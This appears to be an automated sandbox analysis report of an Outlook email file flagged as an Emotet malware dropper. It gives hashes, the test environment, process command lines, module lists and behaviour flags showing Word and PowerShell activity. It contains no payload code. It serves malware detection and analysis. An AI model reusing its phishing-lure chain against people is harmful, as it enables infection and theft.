2be35b9061b98d4ce81ed08ae68a0c215abdd14a61ebcb6ed45d7f9cc043342b

General Info

File name: RE Bemobile Limited (PNGPM SLBBM) SIM Audit 2019 .msg

Full analysis: https://app.any.run/tasks/98e28d2c-1419-441f-bd45-c8dbb4c71f33

Verdict: Malicious activity

Threats:

emotet

Emotet is an extremely sophisticated and destructive banking Trojan used to download and install other malware. First recorded in 2014, Emotet has gained advanced capabilities over the course of its lifetime. Today Emotet is targeting governments, corporations, small businesses and individuals, focusing on Europe, America, and Canada.

Malware Trends Tracker

More details

Analysis date: 11/8/2019, 15:03:59

OS:: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)

Tags:: emotet-doc

emotet

Indicators:

MIME:: application/vnd.ms-outlook

File info:: CDFV2 Microsoft Outlook Message

MD5: b7d979a55307e5d8c3e6b446683b2e5b

SHA1: 14c9de227c42b123af3b5df17166cc091426710d

SHA256: 2be35b9061b98d4ce81ed08ae68a0c215abdd14a61ebcb6ed45d7f9cc043342b

SSDEEP: 6144:uengUu1fLFxmxYAgOLA+biMpzCWoN8OB:uengUu1fLFx8gUjbiGCWoCO

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration: 60 seconds

Additional time used: none

Fakenet option: off

Heavy Evaision option: off

MITM proxy: off

Route via Tor: off

Network geolocation: off

Privacy: Public submission

Autoconfirmation of UAC: on

Software preset

Internet Explorer 8.0.7601.17514
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (75.0.3770.100)
Google Update Helper (1.3.34.7)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.7.2 (4.7.03062)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
Microsoft Office Proof (German) 2010 (14.0.4763.1000)
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB4019990
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Behavior activities

MALICIOUS	SUSPICIOUS	INFO
Drops known malicious document WINWORD.EXE (PID: 2644) OUTLOOK.EXE (PID: 2428)	Creates files in the user directory OUTLOOK.EXE (PID: 2428) powershell.exe (PID: 236) Executed via WMI powershell.exe (PID: 236) Starts Microsoft Office Application OUTLOOK.EXE (PID: 2428) WINWORD.EXE (PID: 2644) Reads Internet Cache Settings OUTLOOK.EXE (PID: 2428) Application launched itself WINWORD.EXE (PID: 2644) PowerShell script executed powershell.exe (PID: 236)	Reads Microsoft Office registry keys OUTLOOK.EXE (PID: 2428) WINWORD.EXE (PID: 1016) WINWORD.EXE (PID: 2644) Creates files in the user directory WINWORD.EXE (PID: 2644)

MALICIOUS

SUSPICIOUS

INFO

Drops known malicious document

WINWORD.EXE (PID: 2644)
OUTLOOK.EXE (PID: 2428)

Creates files in the user directory

OUTLOOK.EXE (PID: 2428)
powershell.exe (PID: 236)

Executed via WMI

powershell.exe (PID: 236)

Starts Microsoft Office Application

OUTLOOK.EXE (PID: 2428)
WINWORD.EXE (PID: 2644)

Reads Internet Cache Settings

OUTLOOK.EXE (PID: 2428)

Application launched itself

WINWORD.EXE (PID: 2644)

PowerShell script executed

powershell.exe (PID: 236)

Reads Microsoft Office registry keys

OUTLOOK.EXE (PID: 2428)
WINWORD.EXE (PID: 1016)
WINWORD.EXE (PID: 2644)

Creates files in the user directory

WINWORD.EXE (PID: 2644)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD

.msg

| Outlook Message (41.3%)

.oft

| Outlook Form Template (24.1%)

.doc

| Microsoft Word document (18.6%)

.doc

| Microsoft Word document (old ver.) (11%)

Screenshots

Screenshot of 2be35b9061b98d4ce81ed08ae68a0c215abdd14a61ebcb6ed45d7f9cc043342b taken from 19276 ms from task started

Screenshot of 2be35b9061b98d4ce81ed08ae68a0c215abdd14a61ebcb6ed45d7f9cc043342b taken from 20306 ms from task started

Screenshot of 2be35b9061b98d4ce81ed08ae68a0c215abdd14a61ebcb6ed45d7f9cc043342b taken from 21311 ms from task started

Screenshot of 2be35b9061b98d4ce81ed08ae68a0c215abdd14a61ebcb6ed45d7f9cc043342b taken from 25315 ms from task started

Screenshot of 2be35b9061b98d4ce81ed08ae68a0c215abdd14a61ebcb6ed45d7f9cc043342b taken from 26319 ms from task started

Screenshot of 2be35b9061b98d4ce81ed08ae68a0c215abdd14a61ebcb6ed45d7f9cc043342b taken from 27320 ms from task started

Screenshot of 2be35b9061b98d4ce81ed08ae68a0c215abdd14a61ebcb6ed45d7f9cc043342b taken from 28326 ms from task started

Screenshot of 2be35b9061b98d4ce81ed08ae68a0c215abdd14a61ebcb6ed45d7f9cc043342b taken from 29331 ms from task started

Screenshot of 2be35b9061b98d4ce81ed08ae68a0c215abdd14a61ebcb6ed45d7f9cc043342b taken from 30336 ms from task started

Screenshot of 2be35b9061b98d4ce81ed08ae68a0c215abdd14a61ebcb6ed45d7f9cc043342b taken from 32347 ms from task started

Screenshot of 2be35b9061b98d4ce81ed08ae68a0c215abdd14a61ebcb6ed45d7f9cc043342b taken from 35512 ms from task started

Screenshot of 2be35b9061b98d4ce81ed08ae68a0c215abdd14a61ebcb6ed45d7f9cc043342b taken from 36512 ms from task started

Screenshot of 2be35b9061b98d4ce81ed08ae68a0c215abdd14a61ebcb6ed45d7f9cc043342b taken from 37517 ms from task started

Screenshot of 2be35b9061b98d4ce81ed08ae68a0c215abdd14a61ebcb6ed45d7f9cc043342b taken from 45629 ms from task started

Screenshot of 2be35b9061b98d4ce81ed08ae68a0c215abdd14a61ebcb6ed45d7f9cc043342b taken from 49701 ms from task started

Screenshot of 2be35b9061b98d4ce81ed08ae68a0c215abdd14a61ebcb6ed45d7f9cc043342b taken from 57017 ms from task started

Screenshot of 2be35b9061b98d4ce81ed08ae68a0c215abdd14a61ebcb6ed45d7f9cc043342b taken from 63079 ms from task started

Screenshot of 2be35b9061b98d4ce81ed08ae68a0c215abdd14a61ebcb6ed45d7f9cc043342b taken from 67133 ms from task started

Screenshot of 2be35b9061b98d4ce81ed08ae68a0c215abdd14a61ebcb6ed45d7f9cc043342b taken from 68138 ms from task started

Processes

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

–

Specs description

Program did not start

Integrity level elevation

Task сontains an error or was rebooted

Process has crashed

Task contains several apps running

Executable file was dropped

Debug information is available

Process was injected

Network attacks were detected

Application downloaded the executable file

Actions similar to stealing personal data

Behavior similar to exploiting the vulnerability

Inspected object has sucpicious PE structure

File is detected by antivirus software

CPU overrun

RAM overrun

Process starts the services

Process was added to the startup

Behavior similar to spam

Low-level access to the HDD

Probably Tor was used

System was rebooted

Connects to the network

Known threat

Process information

Click at the process to see the details.

PID: 2428

CMD: "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\RE Bemobile Limited (PNGPM SLBBM) SIM Audit 2019 .msg"

Path: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE

Indicators

Parent process: ––

User: admin

Integrity Level: MEDIUM

Version:

Company: Microsoft Corporation

Description: Microsoft Outlook

Version: 14.0.6025.1000

Modules

Image
c:\program files\microsoft office\office14\outlook.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\msi.dll
c:\windows\system32\ole32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcp90.dll
c:\windows\system32\apphelp.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\microsoft office\office14\addins\umoutlookaddin.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msimtf.dll
c:\program files\microsoft office\office14\1033\outllibr.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\progra~1\micros~1\office14\olmapi32.dll
c:\progra~1\micros~1\office14\1033\mapir.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\dwmapi.dll
c:\progra~1\micros~1\office14\contab32.dll
c:\progra~1\micros~1\office14\omsxp32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\progra~1\micros~1\office14\mspst32.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll
c:\progra~1\micros~1\office14\exsec32.dll
c:\windows\system32\tzres.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\progra~1\micros~1\office14\rtfhtml.dll
c:\windows\system32\mlang.dll
c:\program files\microsoft office\office14\1033\omsintl.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\propsys.dll
c:\windows\system32\msxml6.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\system32\normaliz.dll
c:\windows\installer\{90140000-003d-0000-0000-0000000ff1ce}\wordicon.exe
c:\windows\system32\windowscodecs.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\mssprxy.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\profapi.dll
c:\program files\microsoft office\office14\omsmain.dll
c:\windows\system32\winmm.dll
c:\program files\microsoft office\office14\addins\colleagueimport.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wkscli.dll
c:\program files\microsoft office\office14\onbttnol.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\program files\microsoft office\office14\socialconnector.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\winsxs\x86_microsoft.vc90.mfc_1fc8b3b9a1e18e3b_9.0.30729.6161_none_4bf7e3e2bf9ada4c\mfc90u.dll
c:\windows\winsxs\x86_microsoft.vc90.mfcloc_1fc8b3b9a1e18e3b_9.0.30729.6161_none_49768ef57548175e\mfc90enu.dll
c:\windows\system32\mapi32.dll
c:\windows\system32\oleacc.dll
c:\program files\microsoft office\office14\1033\umoutlookstrings.dll
c:\program files\microsoft office\office14\sharepointprovider.dll
c:\windows\system32\sxs.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\progra~1\micros~1\office14\outlacct.dll
c:\windows\system32\msident.dll
c:\windows\system32\pstorec.dll
c:\windows\system32\atl.dll
c:\windows\system32\winspool.drv
c:\program files\common files\system\ole db\oledb32.dll
c:\windows\system32\msdart.dll
c:\windows\system32\bcrypt.dll
c:\program files\common files\system\ole db\oledb32r.dll
c:\windows\system32\comsvcs.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\tquery.dll
c:\windows\system32\structuredquery.dll
c:\program files\microsoft office\office14\msproof7.dll
c:\program files\common files\microsoft shared\proof\mslid.dll
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\shdocvw.dll
c:\windows\system32\msiltcfg.dll
c:\windows\system32\msoeacct.dll
c:\windows\system32\msoert2.dll
c:\windows\system32\inetcomm.dll
c:\windows\system32\inetres.dll
c:\windows\system32\acctres.dll
c:\windows\system32\msxml3.dll

PID: 2644

CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\22FMGLEE\NOTICE_Z63152.doc"

Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Indicators: No indicators

Parent process: OUTLOOK.EXE

User: admin

Integrity Level: MEDIUM

Version:

Company: Microsoft Corporation

Description: Microsoft Word

Version: 14.0.6024.1000

Modules

Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\winspool.drv
c:\windows\system32\shell32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\profapi.dll
c:\windows\system32\sxs.dll
